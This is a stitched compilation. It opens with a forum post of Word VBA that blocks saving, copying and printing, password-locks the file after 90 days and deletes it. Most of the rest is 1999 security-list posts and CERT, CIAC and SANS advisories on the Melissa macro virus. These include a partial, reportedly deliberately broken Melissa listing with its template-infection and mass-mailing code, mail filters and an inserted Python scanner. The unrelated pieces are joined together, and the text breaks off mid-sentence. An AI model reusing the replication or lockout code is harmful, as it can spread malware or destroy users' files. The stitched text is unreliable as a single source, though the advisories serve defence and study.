Good Morning Mr. Phelps..
Well, my answer is "yes and no" to the question, "Is the mission possible?" There is always
something that you didn't anticipate, such as someone doing a screen capture or a save to
Skydrive that the Word 2011 object model fails to support... but even with those shortcomings, it
is not as far-fetched as you think.
Here is free code, but if the OP is really serious, that will cost $,$$$.
Place this in a document saved as a ".docm" format. Into the "ThisDocument" class:
Option Explicit

' The two statements below appear in the original post outside any procedure.
' VBA does not allow executable statements at module level, so they are kept
' here as comments rather than left to break compilation:
'   StopCount = StopCount + 1
'   weThereYet = Application.Documents.Count

Public Const notAllowed As String = "This is not allowed Mr. Phelps"
Public Const bigGuy As String = "The Big Guy"

' Word runs a macro whose name matches a built-in command (FileSave, EditCopy,
' FilePrint, ...) in place of that command. Each procedure below therefore
' intercepts one command and refuses it with a message box. Note that this
' only holds while macros are enabled; a user who opens the file with macros
' disabled gets the normal commands back.
Sub FileSaveAs()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSave()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub WebPagePreview()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub SendToMsgr()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub ActivateObject()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub CreateAutoText()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub CreateSubdocument()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FilePrint()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FilePost()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub EditCopy()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub EditCut()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub AutoText()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub CopyText()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub EditAutoText()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSaveAsWebPage()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSaveHtml()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSaveToServer()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSendMail()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSendMailBody()
    MsgBox notAllowed, vbCritical, bigGuy
End Sub

' Expiry check: 90 days after the document's built-in creation date, lock the
' file with an open password and close it.
Private Sub Document_Open()
    Dim oDate As Date
    oDate = ActiveDocument.BuiltInDocumentProperties("Creation date")
    If Now > oDate + 90 Then
        MsgBox "Document has expired."
        With ActiveDocument
            .Password = "mydog"
            .Save
            .Close
        End With
    End If
End Sub

' NOTE: this last routine is written against the Excel object model
' (ThisWorkbook, ChangeFileAccess, xlReadOnly). It will not compile in a Word
' ThisDocument module and is kept here as posted; a Word equivalent would have
' to be written against the Document object.
Sub KillMe()
    With ThisWorkbook
        .Saved = True
        .ChangeFileAccess Mode:=xlReadOnly
        Kill .FullName
        .Close False
    End With
End Sub
I normally don't allow virus posts through the list as they seldom represent
a new threat, just a new example of an already existing one, but this one
is getting enough play to warrant a message.
There is a new Word macro virus circulating called Melissa. The virus
propagates via email. Attached to the email is a Word file that when
opened will launch a macro that will send the same message to the first
50 recipients of your Outlook address book. The subject line is
"important Message From <some user name>". The body consists of the text
"Here is that document you asked for... don't show anyone else;-)".
The infected document contains passwords to porn web sites.
As this thing is emailing itself to everyone under the sun virus vendors
should have no problem obtaining copies to analyze. If anyone wants a copy
send me a message.
--
Aleph One / [email protected]
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
----------------------------------------------------------------------------
Sorry to add one more message to this. I placed the code up on my site,
formatted so that it is readable.
http://www.root.org/
-Nate
[http://www.root.org/melissa_virus.txt]
CYA:
----------------------------------------------------------------------------
Here is my analysis of how the virus works. The McAfee article aleph1
posted neglects to mention that it infects the active document and
Normal.dot
After sending the mail, add the registry key to disable further
infection.
4. Open the Active Document and Normal.dot and infect them with itself
5. On the way out, check if the current day equals the current minute.
If so, print "Twenty-two points, plus triple-word-score, plus fifty points
for using all my letters. Game's over. I'm outta here."
It does not appear to do anything malicious other than shutting down your
mail server with tons of mail as users start opening the attachment. It
appears the virus vendors have a patch out now. To avoid infection,
disable macros when opening any Word document or just don't open the
attachment. Thanks to Josh Siegel for sending me the code.
-Nate
----------------------------------------------------------------------------
In all the clamor over the spreading aspect, we forgot to tell people that
it's a normal macro virus in all other means. And that if you don't have
Outlook, breathe calm. But if you do have Outlook, WATCH OUT!
And the kicker? Look at the first 50 names in your address books? How many
mailing lists are there?
This time. We have discovered that it was posted to alt.sex in a file named
LIST.ZIP.
> After sending the mail, add the registry key to disable further
>infection.
Disables future mailings. Infections can happen again. But the email blast
will happen only the first time, unless you clean the registry. So we
recommend that you do not remove that element of the registry.
>4. Open the Active Document and Normal.dot and infect them with itself
>5. On the way out, check if the current day equals the current minute.
>If so, print "Twenty-two points, plus triple-word-score, plus fifty points
>for using all my letters. Game's over. I'm outta here."
>It does not appear to do anything malicious other than shutting down your
>mail server with tons of mail as users start opening the attachment. It
>appears the virus vendors have a patch out now. To avoid infection,
>disable macros when opening any Word document or just don't open the
>attachment. Thanks to Josh Siegel for sending me the code.
Good ideas.
Jimmy Kuo
Director, AV Research, Network Associates
(or as he says, McAfee)
[email protected]
----------------------------------------------------------------------------
On a lighter side...
AW
-----Original Message-----
>From: Dan Schrader [mailto:[email protected]]
Sent: Friday, March 26, 1999 6:56 PM
To: 'Aaron Wood'; [email protected]
Subject: RE: [BugTraq] Melissa Macro Virus (fwd)
Trend Micro has a free tool for scanning your exchange servers to ensure
that they are not harboring any infected documents. The tool, called
HouseCall for Microsoft Exchange is available at:
http://housecall.antivirus.com/smex_housecall/
<http://housecall.antivirus.com/smex_housecall/>
This detects, but does not cure infected files. HouseCall for Exchange is
an ActiveX Control - so you need Microsoft IE with security settings set to
medium or low to run it. Considering this audience, I suspect you will want
to remember to set those settings back when you are done.
Virus Description:
This virus works with both Word 97 and Word 2000 and the macro activates
when an infected document is closed. If it is activated in Word 2000, it
will lower the security setting to the lowest level by modifying the
registry and will disable the Word menu commands (Macro\Security) which
allows the user to reinstate security settings. In Word97, the virus
disables the Tools/Macro menu commands, the Confirm Conversions option, the
MS Word macro virus protection, and the Save Normal Template prompt. The
virus then checks to see if the registry key
"HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?" contains the value
"... by Kwyjibo." This is how the virus determines whether it has activated
on this system.
The virus then opens Outlook, if present on the system, and sends one email
for each address list. The email may contain up to 50 recipients. The email
will contain the subject line: "Important Message From {user name}" and the
message body will be "Here is that document you asked for . . . don't show
anyone else :-)" The virus then attaches a copy of the infected active
document to the outgoing mail. The name of the original infected attachment
was List.doc, but it could be any name.
If the user does not have Outlook, the virus will not work. Then the virus
modifies the value of the registry key mentioned above so it is equal to
"... by Kwyjibo" -- indicating that it has successfully activated on this
computer. After that, the virus checks to see if the normal template and
active document are infected, and if either is not, it infects the file.
Finally, if the day of the month is equal to the minute (for example, if it
is March 26 at 3:26 pm), the virus will type the following text on the
active document: "Twenty-two points, plus triple-word-score, plus fifty
points for using all my letters. Game's over. I'm outta here."
Trend Micro has detection for this virus in its latest pattern update,
"510". Users are encouraged to download and install this latest pattern
update. The protection will also be included in the regular weekly update.
----------------------------------------------------------------------------
Systems Affected
Overview
Our analysis of this macro virus indicates that human action (in the
form of a user opening an infected Word document) is required for this
virus to propagate. It is possible that under some mailer
configurations, a user might automatically open an infected document
received in the form of an email attachment. This macro virus is not
known to exploit any new vulnerabilities. While the primary transport
mechanism of this virus is via email, any way of transferring files
can also propagate the virus.
Anti-virus software vendors have called this macro virus the Melissa
macro or W97M_Melissa virus.
I. Description
Where <name> is the full name of the user sending the message.
Here is that document you asked for ... don't show anyone else ;-)
Upon execution, the virus first lowers the macro security settings to
permit all macros to run when documents are opened in the future.
Therefore, the user will not be notified when the virus is executed in
the future.
"HKEY_Current_User\Software\Microsoft\Office\Melissa?"
has a value of "... by Kwyjibo". If that registry key does not exist
or does not have a value of "... by Kwyjibo", the virus proceeds to
propagate itself by sending an email message in the format described
above to the first 50 entries in every MAPI address book readable by
the user executing the macro. Keep in mind that if any of these email
addresses are mailing lists, the message will be delivered to everyone
on the mailing lists. In order to successfully propagate, the affected
machine must have Microsoft Outlook installed; however, Outlook does
not need to be the mailer used to read the message.
Next, the macro virus sets the value of the registry key to "... by
Kwyjibo". Setting this registry key causes the virus to only propagate
once per session. If the registry key does not persist through
sessions, the virus will propagate as described above once per every
session when a user opens an infected document. If the registry key
persists through sessions, the virus will no longer attempt to
propagate even if the affected user opens an infected document.
The macro then infects the Normal.dot template file. By default, all
Word documents utilize the Normal.dot template; thus, any newly
created Word document will be infected. Because unpatched versions of
Word97 may trust macros in templates, the virus may execute without
warning. For more information please see:
http://www.microsoft.com/security/bulletins/ms99-002.asp
Finally, if the minute of the hour matches the day of the month at
this point, the macro inserts into the current document the message
"Twenty-two points, plus triple-word-score, plus fifty points for
using all my letters. Game's over. I'm outta here."
Note that if you open an infected document with macros disabled and
look at the list of macros in this document, neither Word97 nor
Word2000 list the macro. The code is actually VBA (Visual Basic for
Applications) code associated with the "document.open" method. You can
see the code by going into the Visual Basic editor.
If you receive one of these messages, keep in mind that the message
came from someone who is affected by this virus and they are not
necessarily targeting you. We encourage you to contact any users from
which you have received such a message. Also, we are interested in
understanding the scope of this activity; therefore, we would
appreciate if you would report any instance of this activity to us
according to our Incident Reporting Guidelines document available at:
http://www.cert.org/tech_tips/incident_reporting.html
II. Impact
III. Solutions
* Block messages with the signature of this virus at your mail transfer
agents.
With Sendmail
Most virus scanning tools will detect and clean macro viruses. In
order to detect and clean current viruses you must keep your
scanning tools up to date with the latest definition files.
http://vil.mcafee.com/vil/vm10120.asp
http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
+ Symantec
http://www.symantec.com/avcenter/venc/data/mailissa.html
+ Trend Micro
http://housecall.antivirus.com/smex_housecall/technotes.html
http://www.nai.com/services/support/vr/free.asp
Acknowledgements
Additionally we would like to thank the many sites who reported this
activity.
______________________________________________________________________
Email: [email protected]
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
Using encryption
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie
Mellon University makes no warranties of any kind, either expressed or
implied as to any matter including, but not limited to, warranty of
fitness for a particular purpose or merchantability, exclusivity or
results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from
patent, trademark, or copyright infringement.
______________________________________________________________________
Revision History
iQCVAwUBNvy9H3VP+x0t4w7BAQG1ggP7B8ItzTRpkP2O8JK7olIOdmn072PIZZxE
mJDW+A9fLDvRZQlVDSsFz/aH8ivmhor5ZbvtT14OmfIZWvxYdFnbO/s2WYL7+fV5
jL6mSb4AJ6lRXIYii+t22V0lvqJdP6VRFqy9EibpMtU2dhgFYf3TKX5e6wajOmBx
bZ6Ef5jPilA=
=aABH
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
The one thing I would like to add is that the virus code actually walks
through every available address list and grabs 50 recipients off of each for
a separate message, so if your Outlook client is attached to an Exchange
Server, it will hit the Global Address List and other available containers,
where it may find large distribution lists.
Jim Reavis
SecurityPortal.com - The focal point for security on the Net
[email protected]
----------------------------------------------------------------------------
__________________________________________________________
INFORMATION BULLETIN
The W97M.Melissa Word macro virus has been seen within the DOE complex. This
macro virus attaches to Word objects in Word 97 and Word 2000. Because of
this method of infection, this virus will not infect older versions of
Microsoft Word. When an infected document is opened, the virus checks to
see if Word 97 or Word 2000 is installed and then disables the Macro
toolbar.
It then disables the following Word options:
HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?
If that string is not equal to "... by Kwyjibo" the virus sends copies of the
infected document to the first 50 people in each of your Outlook address
books and then sets the registry key so it does not do this again. It sends
copies of the infected document to others by opening a connection to Microsoft
Outlook and creating an e-mail message with the subject:
where <username> is replaced with the current Word user's name (Tools, Options
command, User Information tab). The body of the message contains the following
text:
Here is that document you asked for ... don't show anyone else ;-)
The virus then inserts the first 50 users from your Outlook address book,
attaches the infected document and sends the message. It does this for however
many address books you have defined in Outlook.
After sending itself to the people in your address books, the virus then
checks to see if it is running on a document or the Normal.dot template. If
it is running on a document, it infects the Normal.dot template with a
Document_Close macro that runs whenever a document is closed. If it is
running on the Normal.dot template, it infects the active document with a
Document_Open macro that runs whenever a document is opened. After the
Normal.dot template is infected, the virus infects every document you work
on as soon as you close them. If you share these documents with anyone, you
will spread the virus.
Finally, if the minute of the hour equals the day of the month, the virus
inserts the following message at the current location in the active document.
Several antivirus vendors have a detection and cleaning capability for this
virus; however, you must go to the vendors web site to get the scanner
updates. Scanners with automatic or live update features do not yet get the
update required to find and clean this virus. While we expect the detection
strings to be in the automatic updates in the near future, for the next
week or two you should get the scanner directly from your vendor's web site.
We have verified that the Norton Antivirus updater obtained from the
Symantec web site (http://www.symantec.com/techsupp/custom/mailissa.html)
does detect the virus, the current live update does not. We have reliable
information that McAfee (http://vil.mcafee.com/vil/vm10120.asp), and
Trend Micro (http://housecall.antivirus.com/smex_housecall/technotes.html)
also have detection capabilities.
If you receive an e-mail with the following subject and body, DO NOT OPEN the
attachment.
Subject:
Important Message From <username>
Body:
Here is that document you asked for ... don't show anyone else ;-)
Make sure the sender is someone you know and then ask them if they really
sent you the attachment before opening it. If they did not send it, do not
open the attachment and contact your computer security manager. The most
common name for the attached file is list1.doc but that name can change.
Another option to see if a system has been infected is to use Regedit and
search for the following registry key:
HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?
If that key exists and has the value "... by Kwyjibo" the system has been
infected at some time. Note that the infection may have been removed without
deleting the key. This key can be deleted, but does no damage if left alone.
Protecting A System
===================
To protect Word from this and other Word macro viruses, first ensure that Word
has been patched with the Word 97 Template vulnerability patch
(http://www.microsoft.com/security/bulletins/ms99-002.asp); second, the
normal.dot template file should be password protected; and third, the
following Word 97 options should be enabled.
To password protect the Normal.dot file in Word 97, perform these steps:
1. Start Word.
2. Choose the Tools, Macro, Visual Basic Editor command.
3. In the Project window of the Visual Basic Editor, click on Normal.
4. Choose the Tools, Normal Properties command, Protection tab.
5. Check the Lock Project for Viewing check box and type in a password twice.
6. Close the dialog box, close the Visual Basic editor.
7. Quit Word.
The next time you start Word, the normal.dot template will be protected.
WARNING: If you ever have to type in the password to make changes to the
normal.dot file be aware that the file remains unprotected until you quit
Word and restart it.
Some simple macro virus protection is built into Word 97. It does not detect
specific macro viruses but only informs you if macros exist on a document you
are trying to open. Macros detected by Macro Virus Protection are not
necessarily a virus. However, if you are alerted to a macro attached to a
document you should be extremely wary because most people do not have macros
attached to their documents.
Prompt to save Normal template. This makes Word display a dialog box
asking you to confirm changes to the Normal.dot template. Most
macro viruses hide in Normal.dot so this lets you know that there
has been a change that you may want to prevent. Changes also occur
when you change the default font or one of the built-in styles.
To turn on macro virus protection and these other options, perform these
steps:
1. Start Word.
2. Choose the Tools, Options command, General tab.
3. Check the Macro Virus Protection check box.
4. Check the Confirm conversions at open check box.
5. Choose the Save tab.
6. Check the Prompt to save Normal template check box.
7. Close the dialog box.
Whenever you open a document that contains macros, the macro virus protection
opens a dialog box telling you that there are macros in the document and
giving you the option to: Open the document with the macros enabled, open
the document without the macros, or cancel the open operation. You should
only open a document with macros enabled if you are expecting there to be
macros on that document and you know what they are supposed to do.
If a site has been infected you may need to block the virus infected mail
messages with your mail servers. The following filter was written by Scott
Hutton (Lead Security Engineer, Information Technology Security Office) of
Indiana University. As Scott mentions, this filter blocks all messages with
the text "Important Message From" in the subject line, which may block
messages that do not contain the virus. Use this filter at your own
discretion.
HSubject: $>CheckSubject

SCheckSubject
RImportant Message From $+	$#error $: 553 Subject Error
R$*	$@ OK

Don't forget that there are tabs before $#error and $@ OK. This will
block any message where the subject begins with "Important Message
From ...", which may be too rash of an action at your site.
Another filter was obtained by the CERT team from Nick Christenson of
sendmail.com
ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-filter.txt
_____________________________________________________________________________
Thanks to Scott Hutton for the preliminary analysis and for a sendmail
filter. Thanks to CERT and Nick Christenson of sendmail.com for another
sendmail filter.
_____________________________________________________________________________
CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: [email protected]
If you include the word 'help' in the body of an email to the above address,
it will also send back an information file on how to subscribe/unsubscribe,
get past issues of CIAC bulletins via email, etc.
PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.
iQCVAwUBNv07sLnzJzdsy3QZAQEZjwQA6+nHONNAmoosXGsy9eJ6nuIPlFNQ3nM9
+XN1vnqBNI9Hp3kBIXtPXywY4W19NQbyyax6YI+ugmmNfNPEdefeHqnNGuz3dqcW
Ce2RQWnPB1dRrUBTorU+cZHsaq+qaX4s2jSNFlJCFeSuUjNYhzVI6HHilhvGZCQI
wuSjLbuYabo=
=KVaC
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
The Melissa "virus" isn't just an ordinary "word processor" macro but
rather a Visual BASIC Application extension thing that gets run by the
application when the document is open. According to CERT neither Word97
nor Word2000 list the macro when an infected document is opened with
macros disabled, even if you explicitly look for macros -- i.e. you can
only see the macro if you let it execute. This is absurdly stupid.
(And of course what's also insidious, and new to me, about this "virus" is
that it immediately and silently disables the feature which would
normally require confirmation before executing macros, thus opening up
the door for its simpler brethren, so to speak.)
--
Greg A. Woods
I have been getting a lot of flames and veiled threats from individuals
and "virus researchers" for posting the code yesterday. There seems to be
a lot of misinformation going around so I wanted to clarify the situation.
These people are all producing the same arguments:
1. "Posting the source allows someone to know how to write a Macro virus"
Yes, and any one of the 100,000 or more people who got the virus the other
day can buy VB and do File->Open and see the source. Repeat after me:
"Word macros are INTERPRETED". All symbol information is present. No
decompilation necessary.
http://www.mit.edu:8001/people/eichin/www/virus/main.html
In short, this is the same full disclosure vs. security through obscurity
debate. Make your own decision what is appropriate; my mind has been made
up in regards to this for at least a decade. Viruses tend to be
uninventive and boring. This one was extremely unsophisticated, exploited
no new holes, and required user carelessness to spread. I only got
involved because I had to help fend off the nuisance Friday. I hope
everyone found the postings useful and will demand better virus protection
than string matching from their virus scanner vendor as well as request
that Microsoft add more virus prevention than "enable macros? yes/no" and
disallow macros from doing things like sending mail or writing to files
without notice to the user.
-Nate
----------------------------------------------------------------------------
That's a job that regular procmail is well suited to. If the subject
is fixed (hang on, reading bugtraq...)
Per Aleph1:
The subject line is "important Message From <some user name>". The
body consist of the text "Here is that document you asked for...
don't show anyone else;-)".
:0 H
* ^Subject:.*important Message From
{
  :0 B
  * Here is that document you asked for
  * don't show anyone else
  * ^Content-.*: .*\.do[ct]
  {
    LOG='REJECT Possible "Melissa" Microsoft Word macro worm: '
    :0
    security-quarantine
  }
}
--
John Hardin KA7OHZ [email protected]
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
In the Lion
the Mighty Lion
the Zebra sleeps tonight...
Dee de-ee-ee-ee-ee de de de we um umma way!
-----------------------------------------------------------------------
52 days until Star Wars episode I
----------------------------------------------------------------------------
Aaron Wood writes (my comments are on Trend's press release forwarded by
him):
> In Word97, the virus disables the Tools/Macro menu commands, the
> Confirm Conversions option, the MS Word macro virus protection, and
> the Save Normal Template prompt.
> The name of the original infected attachment was List.doc, but it
> could be any name.
Theoretically, yes. But keep in mind that the virus sends itself by
e-mail only when it infects a clean system. What it sends is the
document which has infected the system. Originally, the virus was
distributed in a file named LIST.DOC and posted to alt.sex by a person
known to have posted new viruses to the newsgroups before. So, in most
cases this is the document which infects the systems for the first time
and it is what is sent around. The only way to begin sending something
else is if you get infected by opening another user's infected document
which you have received by other means (i.e., not by the virus sending
it to you).
> If the user does not have Outlook, the virus will not work.
That's not true - the virus works perfectly, in the sense that it
replicates and infects. It just can't send itself around in e-mail
attachments. But, as we know, this is by far not the only way a virus
can use to spread. :-)
Another thing - the virus never terminates the copy of Outlook it starts
- at least not explicitly. I haven't verified that, but if that copy
really remains in memory, opening several infected documents would
eventually slow down and crash your system - because of the many copies
of Outlook running in the background. The virus starts Outlook each time
you open an infected document - although it sends itself by e-mail only
if the system wasn't already infected.
> After that, the virus checks to see if the normal template and active
> document are infected, and if either is not, it infects the file.
"File" here means "whatever is not infected - either the active document
or the normal template".
> Trend Micro has detection for this virus in its latest pattern update,
Most anti-virus producers have. The update for our product (F-PROT and
F-MACROW) can be found at the usual place:
ftp://ftp.complex.is/pub/macrdef2.zip
Regards,
Vesselin
--
Vesselin Vladimirov Bontchev, not speaking for FRISK Software International,
producers of F-PROT. Postholf 7180, IS-127, Reykjavik, Iceland
e-mail: [email protected], tel.: +354-561-7273, fax: +354-561-7274
PGP 2.6.2i key fingerprint: E5 FB 30 0C D4 AA AB 44 E5 F7 C3 18 EA 2B AE 4E
----------------------------------------------------------------------------
NOTE: SANS will be changing email and web servers this week. We hope
to avoid service interruptions, but some error might creep in. Problems
to <[email protected]>.
Table of Contents:
1. What Melissa teaches us
1.1 Infection Speed
1.2 Collateral Damage
1.3 Need for Defense in Depth
2. One site's experience in cleaning up after a Melissa infestation
3. Conclusion
Appendix: Melissa Source Code
You will already have heard of the Melissa virus, at least from the SANS
Newsbites, and probably also from newspapers and friends, as well. An
excellent description of the virus, including how to identify it and
contain it at the host level, was developed by the Computer Emergency
Response Team at Carnegie Mellon University. This document is available
at: http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html .
According to NAI's web site listed above, the virus was first discovered
on an "alt.sex" newsgroup and spread rapidly. On the same day the virus
was first discovered "in the wild" it caused major infections and reports
from a large number of Department of Defense and Department of Energy
sites. Many of you will probably find out today that your site has been
infected as well. This serves as a warning of how fast a virus with an
unknown signature can spread. A modified, non-operative copy of the
source code is included as an appendix to this document. If you search
the listing for the string "For y = 1 To", you can see how the virus
replicated so rapidly by going through Microsoft Outlook address books
and sending itself to the first 50 entries in each book. Sections in
the code that have been the subject of news reports are marked with
comments that begin with ***.
The Melissa virus apparently does not create any other damage in the
sense of deleting, or stealing files. However, when the smoke clears,
the cost of dealing with Melissa will be measured in the millions of
dollars. It also directly affects sites' ability to send and receive
email. One network engineer, who worked at one of the first sites to
report the problem last Friday March 26, said "I knew something was
wrong before I knew what was wrong. I could feel the network going
slower and slower. As I looked into it, I found the exchange mail
servers were melting down." One of the lessons of Melissa is that a
macro virus can hit very fast and very hard. The engineer went on to
say, "As I composed the last email of the day, a message hit the Inbox
of my Microsoft Outlook email application. The subject line read:
"Important Message From [Jane Doe]". I viewed the message, and the body
read "Here is that document you asked for... don't show anyone else ;-)"
Attached was a Microsoft Word document titled "list1.doc"."
"The clean-up picture would have been much bleaker if we hadn't had so many
things in our favor:
* System administrators were still at work when the problem started
(approximately 1640 on Friday).
* Most of the users were gone for the weekend (and didn't compound the
problem by manually sending additional copies of the infected document).
* All of the system administrators involved in the clean up had been trained
in incident handling based on the SANS' Incident Handling Step by Step
approach.
* The person who needed to make key decisions was trained in incident
response and had already begun carrying a cell phone.
* Base commanders recognized the expertise that was in use and supported
the Incident Handling team by not directing what needed to be done (at
least so far)."
3. Conclusion
Because Melissa exploits one of the most valuable benefits of the net
-- the ability to share documents -- to propagate and to multiply itself,
it will affect far more people far more quickly than earlier viruses.
The silver lining in this cloud is that a relatively benign virus like
Melissa is a low-cost way of gaining user awareness. That same mechanism
can be used by a more malicious attacker to make private information
public and to destroy large amounts of important data. It makes sense
for you to use this opportunity to establish three capabilities if you
have not already done so:
(1) user responsibility and active involvement in protecting their
systems
(2) an incident handling capability (Order Incident Handling Step-by-Step
from the SANS bookstore www.sans.org if you don't already have a roadmap)
(3) user awareness of what to look for, whom to call, and what to say
when they call about a security threat.
NOTE: Several errors have been introduced into this copy of the code as
a safety measure. It will not run in this form. We hope the code we
changed will not overly impact your opportunity to understand how the
software works, but we could not be responsible for furthering the spread
of the live version of Melissa. Text comments have been inserted at
the "famous" locations, preceded by three asterisks "***".
*** Here is the classic subject line "Important Message From". This could,
of course, change in future versions ***
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapName.Logoff
End If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") =
"... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo END
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And
(InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
End Sub
*** The lines above are some of the most published information about
this virus. Though you can look for the virus with intrusion detection
and other string matching security tools by searching for keywords like
"Kwyjibo", simple modifications of the code could change these. ***
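As an added example, not part of the bulletin or of the Melissa listing, here is a small Python scanner that runs over a constructed macro fragment and reports both the well-known literal strings and the behaviours (auto-execution, attaching and mailing the active document, the registry marker, rewriting the Normal template) that survive renaming those strings. The sample module text, the indicator names and the verdict labels are constructed for this example.

```python
import re

# Constructed sample for the scanner: fragments from the published, deliberately
# broken listing above stitched together as one module. Not a working macro.
SAMPLE_MODULE = """\
Private Sub Document_Open()
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
System.PrivateProfileString("", "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\", "Melissa?") = "... by Kwyjibo"
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
'WORD/Melissa written by Kwyjibo
End Sub
"""

# The same fragments with the well-known strings renamed: the "simple
# modification" the bulletin warns about. Constructed to show what a
# string match alone misses.
RENAMED_MODULE = SAMPLE_MODULE.replace("Kwyjibo", "Nobody").replace("Melissa?", "Seen?")

# Literal strings a signature scanner would look for.
SIGNATURE_STRINGS = ("Kwyjibo", "Melissa?", "Important Message From")

# Behavioural indicators: what the macro does, which survives renaming.
BEHAVIOUR_PATTERNS = {
    "auto_exec": r"\bSub\s+(Document_Open|Document_Close|AutoOpen|AutoClose)\b",
    "self_attach": r"\.Attachments\.Add\s+ActiveDocument\.FullName",
    "mail_send": r"\.Send\b",
    "registry_marker": r"PrivateProfileString\([^)]*HKEY_CURRENT_USER",
    "template_access": r"NormalTemplate\.VBProject",
    "code_injection": r"\.CodeModule\.(AddFromString|InsertLines|DeleteLines)",
}


def scan_module(text):
    """Return the signature strings and behavioural indicators found in VBA module text."""
    signatures = [s for s in SIGNATURE_STRINGS if s in text]
    behaviours = [name for name, pat in BEHAVIOUR_PATTERNS.items()
                  if re.search(pat, text, re.IGNORECASE)]
    # Auto-executing code that attaches the open document and mails it is the
    # Melissa pattern whatever the strings inside it are called.
    if {"auto_exec", "self_attach", "mail_send"} <= set(behaviours):
        verdict = "macro worm behaviour"
    elif signatures:
        verdict = "known signature"
    else:
        verdict = "no indicators"
    return {"signatures": signatures, "behaviours": behaviours, "verdict": verdict}


if __name__ == "__main__":
    for label, module in (("original", SAMPLE_MODULE), ("renamed", RENAMED_MODULE)):
        print(label, scan_module(module))
```

Run against the renamed copy, the signature list comes back empty while the behavioural verdict is unchanged, which is the point the comment above makes about string matching.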
----------------------------------------------------------------------------
An interesting thing -- as users are infected with Melissa some of the new
documents they create after infection become the carrier and are mailed
out. If you scan for inbound messages, it would be advised to scan for
outbound messages as well. I received a copy of an employee evaluation
